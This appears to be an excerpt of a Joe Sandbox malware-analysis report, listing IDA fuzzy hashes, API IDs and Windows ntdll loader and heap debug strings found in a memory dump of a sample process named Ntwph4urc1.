                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                            • API String ID: 0-1988757188
                                            • Opcode ID: 940f5e4fcbb88155bd44951fca25357991942c138127988f1cbd113fc5efa4df
                                            • Instruction ID: aea8e162f6a257f46ec049a238c054935b1aea4f217e1ec2489e9e9882b416be
                                            • Opcode Fuzzy Hash: 940f5e4fcbb88155bd44951fca25357991942c138127988f1cbd113fc5efa4df
                                            • Instruction Fuzzy Hash: 75E1A274B043018FE714CE2AC894B1AB7E9BB8437CF604A2DE955CB390DBB1D945CB92
                                            APIs
                                            Strings
                                            • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 369B936B
                                            • GsHd, xrefs: 3696D874
                                            • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 369B9565
                                            • RtlpFindActivationContextSection_CheckParameters, xrefs: 369B9341, 369B9366
                                            • Actx , xrefs: 369B9508
                                            • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 369B9346
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                            • API String ID: 3446177414-2196497285
                                            • Opcode ID: f8ef05118df86cac251415b382fc0a88b06056320b80ca7cad25cab7856e5257
                                            • Instruction ID: 064f8c061153acbf93c64bcee2a361b19a9e57f7d4c1d5d8d1c420295fb425af
                                            • Opcode Fuzzy Hash: f8ef05118df86cac251415b382fc0a88b06056320b80ca7cad25cab7856e5257
                                            • Instruction Fuzzy Hash: 8FE1E674A143018FEB10CF16C880B5AB7E9BF8936CF64492DE9A5DB291D771D848CB92
                                            APIs
                                            • RtlDebugPrintTimes.NTDLL ref: 3694656C
                                              • Part of subcall function 369465B5: RtlDebugPrintTimes.NTDLL ref: 36946664
                                              • Part of subcall function 369465B5: RtlDebugPrintTimes.NTDLL ref: 369466AF
                                            Strings
                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 369A9A2A
                                            • LdrpInitShimEngine, xrefs: 369A99F4, 369A9A07, 369A9A30
                                            • minkernel\ntdll\ldrinit.c, xrefs: 369A9A11, 369A9A3A
                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 369A99ED
                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 369A9A01
                                            • apphelp.dll, xrefs: 36946496
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                            • API String ID: 3446177414-204845295
                                            • Opcode ID: fcfadccad542b0d4bb351d30435f3639a2022c76a0db28c35a9d18b262f69d26
                                            • Instruction ID: aefa4686467521912d91408501caeca0c4adce08cfa31eb15d18ddc1959293d1
                                            • Opcode Fuzzy Hash: fcfadccad542b0d4bb351d30435f3639a2022c76a0db28c35a9d18b262f69d26
                                            • Instruction Fuzzy Hash: 7B519E71618304DFE321DF25CC40B9B77E9FB84668F50491AF685AB2A1EA30DD05CB93
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                            • API String ID: 3446177414-4227709934
                                            • Opcode ID: 70a9a5408893361a0ff7fffa15eba795279937f466067d77da85cf8e92067988
                                            • Instruction ID: b9d81c8269f38a05bed6516d60a6c9a50504bbafe2c2b95c60685bb1663b767c
                                            • Opcode Fuzzy Hash: 70a9a5408893361a0ff7fffa15eba795279937f466067d77da85cf8e92067988
                                            • Instruction Fuzzy Hash: 05415EB9E01209ABDB01DF99C980AEEBBB9FF48354F204159E904A7346D731DD11CBA1
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                            • API String ID: 3446177414-3492000579
                                            • Opcode ID: 293f7cfb2a87cd378a8a896819305163f445d53cdb0238e8f2969630422b36df
                                            • Instruction ID: 9eb2240eea914656371a7aa21b95f246438aee9d32bc4c21c29a5b57b51b5386
                                            • Opcode Fuzzy Hash: 293f7cfb2a87cd378a8a896819305163f445d53cdb0238e8f2969630422b36df
                                            • Instruction Fuzzy Hash: 0A710E71924644DFDB02CFA9D8406AEFBF2FF49314F558059E941AB252CB369D82CB90
                                            APIs
                                            Strings
                                            • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 369A9AF6
                                            • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 369A9AB4
                                            • minkernel\ntdll\ldrinit.c, xrefs: 369A9AC5, 369A9B06
                                            • LdrpLoadShimEngine, xrefs: 369A9ABB, 369A9AFC
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                            • API String ID: 3446177414-3589223738
                                            • Opcode ID: 1228296ecc6030fed70853cbc75e309d49b1c7a8e60d3ef0576fc26656ac28df
                                            • Instruction ID: 091e8951214bd6414e344c3af49645ccfc94fefb4cb1cbe4ec4f1a4f24628924
                                            • Opcode Fuzzy Hash: 1228296ecc6030fed70853cbc75e309d49b1c7a8e60d3ef0576fc26656ac28df
                                            • Instruction Fuzzy Hash: 10513376A103189FDB06EBACCC44A9D7BFABB40308F200165E640BF296CB70DC56CB91
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                            • API String ID: 3446177414-3224558752
                                            • Opcode ID: 9e8ccb785b21a363130d4f8ea6ef810a19c30f708307d10aa35932c7d2675d15
                                            • Instruction ID: 0465e2d4ffe9ef5277bd55d3fba2b81ad06bfc9959708f5262b9480917d35263
                                            • Opcode Fuzzy Hash: 9e8ccb785b21a363130d4f8ea6ef810a19c30f708307d10aa35932c7d2675d15
                                            • Instruction Fuzzy Hash: 59414875910748DFEB12CFA4C884B5AB7B8EF44364F2081A9D9016B391CB78AD85CBD1
                                            APIs
                                            Strings
                                            • Entry Heap Size , xrefs: 369FF26D
                                            • ---------------------------------------, xrefs: 369FF279
                                            • HEAP: , xrefs: 369FF15D
                                            • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 369FF263
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                            • API String ID: 3446177414-1102453626
                                            • Opcode ID: 00b93f542743d364185cb4c73c41e24b6dfa2f612b8fa8b30121575381f36661
                                            • Instruction ID: c4baee637cb75495c4529dd533f86bf6194753b9c9d9a55059b77a632ab17bb8
                                            • Opcode Fuzzy Hash: 00b93f542743d364185cb4c73c41e24b6dfa2f612b8fa8b30121575381f36661
                                            • Instruction Fuzzy Hash: 31417979A20615DFC706DF58C880949BBEAEF4935573681A9D518AF311D733EC43CBA0
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                            • API String ID: 3446177414-1222099010
                                            • Opcode ID: 8905b0fcc836657cc516001b1a8eb4e3142f080f2ffad4d357b235bbd624903e
                                            • Instruction ID: 4839449d6096bae5ef3b2d9b236130a8ce53462380363da50f654116e8defffa
                                            • Opcode Fuzzy Hash: 8905b0fcc836657cc516001b1a8eb4e3142f080f2ffad4d357b235bbd624903e
                                            • Instruction Fuzzy Hash: 39315935504784EFEB22DB68CC48B467BFCEF01754F1440C4E8015B656CBB9EC85CA92
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-$0$0
                                            • API String ID: 1302938615-699404926
                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                            • Instruction ID: d08866918477368b0ac48a952b3e7bf86025d679a279dbce5f57f35466a725b3
                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                            • Instruction Fuzzy Hash: 11810478E0135A9FEF14CE69C8907EFBBF9AF48364F644219D850A7689C7389840CB61
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: $$@
                                            • API String ID: 3446177414-1194432280
                                            • Opcode ID: 570465105df3b23aca43c6b5e59b00ce525a3e64f7036cfaadba59920dc2e2a6
                                            • Instruction ID: 5792ff9f62b86e2d6cccde8dfbe02baef975e1331b92995f347fdff7b7b4f7ab
                                            • Opcode Fuzzy Hash: 570465105df3b23aca43c6b5e59b00ce525a3e64f7036cfaadba59920dc2e2a6
                                            • Instruction Fuzzy Hash: 858169B5D002699FEB21CB55CC44BEEB7B8AF08754F1041EAAA09B7240D7309E85CFA5
                                            APIs
                                            Strings
                                            • Querying the active activation context failed with status 0x%08lx, xrefs: 369C365C
                                            • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 369C362F
                                            • minkernel\ntdll\ldrsnap.c, xrefs: 369C3640, 369C366C
                                            • LdrpFindDllActivationContext, xrefs: 369C3636, 369C3662
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                            • API String ID: 3446177414-3779518884
                                            • Opcode ID: 4ff10f7b077eb9e596849909a110c5cf7d68228fc7aa60421ac05a00ca308d63
                                            • Instruction ID: 8e533147e8045d90afba5f62963f4a315c0784b2f542dd05b992cbe85c1bc5bc
                                            • Opcode Fuzzy Hash: 4ff10f7b077eb9e596849909a110c5cf7d68228fc7aa60421ac05a00ca308d63
                                            • Instruction Fuzzy Hash: ED310466D00751EEFB21DA09CC88A1677ECAF05B98F66406BE90467251EB60BC80C6F6
                                            Strings
                                            • LdrpDynamicShimModule, xrefs: 369BA998
                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 369BA992
                                            • minkernel\ntdll\ldrinit.c, xrefs: 369BA9A2
                                            • apphelp.dll, xrefs: 36972462
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-176724104
                                            • Opcode ID: 9cd6edea1bb47ea24d6ad7dd0c610032e383012a31126bdd548198919b9bb459
                                            • Instruction ID: 47c488bf3e85b289ce9626fbfcc5d14642e1c31082ae1a200c6010b09d6ee7cf
                                            • Opcode Fuzzy Hash: 9cd6edea1bb47ea24d6ad7dd0c610032e383012a31126bdd548198919b9bb459
                                            • Instruction Fuzzy Hash: AC31E475A10301ABEB12DF5D8C40A5ABBBAEB84754F710059EA006B351CAB69C53DB90
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 3446177414-3610490719
                                            • Opcode ID: dd3277f2e9535a3df53150b0518dd8284c436e9b7d6dd3d9fd07ed344771b781
                                            • Instruction ID: 47b789133327efa5802e93b71c0e214b0dd00d5ac8fdaaf0f147f688bc94e355
                                            • Opcode Fuzzy Hash: dd3277f2e9535a3df53150b0518dd8284c436e9b7d6dd3d9fd07ed344771b781
                                            • Instruction Fuzzy Hash: 6B911171A14752DFE717EF25CC90B2AB7E9BF84694F100459E9409B282EB34EC41CB92
                                            APIs
                                            Strings
                                            • Failed to allocated memory for shimmed module list, xrefs: 369BA10F
                                            • LdrpCheckModule, xrefs: 369BA117
                                            • minkernel\ntdll\ldrinit.c, xrefs: 369BA121
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                            • API String ID: 3446177414-161242083
                                            • Opcode ID: 3d394a3929180e31bbef5f383bff8a7dbdef501ccff0a751d5d1314eab1f0f9a
                                            • Instruction ID: 8cb8921758b51139fa589d5e082c59cbd45826d12181c116264522e5646856ff
                                            • Opcode Fuzzy Hash: 3d394a3929180e31bbef5f383bff8a7dbdef501ccff0a751d5d1314eab1f0f9a
                                            • Instruction Fuzzy Hash: 7571ACB4E003059FEF15DF68CD80AAEBBF9EF88304F294069D901EB251E675AD42CB51
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                            • API String ID: 3446177414-2283098728
                                            • Opcode ID: 8c9e2aeafb190e0eb4e40d4a4bf6f79db9e1e77392b1830a7779740fd107e555
                                            • Instruction ID: fd76c32702987b0396b2a9cb8c0da054f250af9a9bc9517fb4a01dce7e40a696
                                            • Opcode Fuzzy Hash: 8c9e2aeafb190e0eb4e40d4a4bf6f79db9e1e77392b1830a7779740fd107e555
                                            • Instruction Fuzzy Hash: 99511671B043029FE715DF29CC84B19B7ADFF84328F24062DE9959B292DB34E815CB82
                                            APIs
                                            Strings
                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 369C82DE
                                            • minkernel\ntdll\ldrinit.c, xrefs: 369C82E8
                                            • Failed to reallocate the system dirs string !, xrefs: 369C82D7
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                            • API String ID: 3446177414-1783798831
                                            • Opcode ID: 95867a132bae9c4f82ee0f8ab48372f27b1e9db7ba9ae2c275d831af277b88b0
                                            • Instruction ID: 17d2f40e82283cd9103d5cf7e6bae7cc10af05344a184e182b621f086dbe5b32
                                            • Opcode Fuzzy Hash: 95867a132bae9c4f82ee0f8ab48372f27b1e9db7ba9ae2c275d831af277b88b0
                                            • Instruction Fuzzy Hash: 034110B5918310EBD722DB28CD40B4B7BE8EF45650F10492AFA48E7251EB35DC02CB92
                                            Strings
                                            • RTL: Resource at %p, xrefs: 369C7B8E
                                            • RTL: Re-Waiting, xrefs: 369C7BAC
                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 369C7B7F
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 0-871070163
                                            • Opcode ID: f55c44530c9477935f2663f12ab541d49bf147a6746cddc7da2eb1ebc6504445
                                            • Instruction ID: 5e936d0619c44aa56433065e852b961ef8218a752fa10ad17f683162ebb058b7
                                            • Opcode Fuzzy Hash: f55c44530c9477935f2663f12ab541d49bf147a6746cddc7da2eb1ebc6504445
                                            • Instruction Fuzzy Hash: 02411479B017029FE710DE25CC40B57B7E9EF88720F240A2DF9699B281DB30E805CB92
                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 369C728C
                                            Strings
                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 369C7294
                                            • RTL: Resource at %p, xrefs: 369C72A3
                                            • RTL: Re-Waiting, xrefs: 369C72C1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 885266447-605551621
                                            • Opcode ID: a70dcd179c96d9ab2eafc8905a5229ee96337ad7bb4e00e8e06f026279aabf44
                                            • Instruction ID: 1594992a19906817ef1f5e689f0f686552d5d59e1203b334e3ee875ffbe89c84
                                            • Opcode Fuzzy Hash: a70dcd179c96d9ab2eafc8905a5229ee96337ad7bb4e00e8e06f026279aabf44
                                            • Instruction Fuzzy Hash: 0C410275B00316AFE710CE25CC42B56B7B9FF84764F240619F954EB241DB20E806CBD2
                                            APIs
                                            Strings
                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 369D4888
                                            • LdrpCheckRedirection, xrefs: 369D488F
                                            • minkernel\ntdll\ldrredirect.c, xrefs: 369D4899
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                            • API String ID: 3446177414-3154609507
                                            • Opcode ID: d601a3aaa7b40d3a842bb5f852cbca4bab58949f2bdaf5690e93973ef1299ab2
                                            • Instruction ID: c8991134adf440fdf1bc953189b10e0333583786ef588cc9e6ddabe67bfb63ae
                                            • Opcode Fuzzy Hash: d601a3aaa7b40d3a842bb5f852cbca4bab58949f2bdaf5690e93973ef1299ab2
                                            • Instruction Fuzzy Hash: 0741AD76A14361DFDB11CE69C840A16BBE9AB89E90F218579ED88AB311D731DC00CBE1
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: %%%u$]:%u
